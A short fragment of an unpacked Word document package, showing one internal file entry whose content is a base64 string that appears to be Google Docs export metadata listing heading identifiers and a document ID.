<file path=word/_rels/header3.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6dYF0mTC7ui9fZgzUPsQP9A2A==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnh4ODFia3FlMmJ6bzIOaC52MHJ4NTlsZ3owa24yDmguMmRtdTVua2g5dXZxMg5oLmdvODVrcW0wb3dwcTIOaC4yNTd4NHBldWp4ZTcyDmguZXdiaGI3ZWs0M3AyMg1oLjF2aXB2MjhoODd2Mg5oLjlnaG50djd4emFiZzIOaC4xNzVmNWNzOTR6MG84AHIhMUx1MDBjY1JSYzBGRjZ5dFVzbC05V1FSek53SDkwMzR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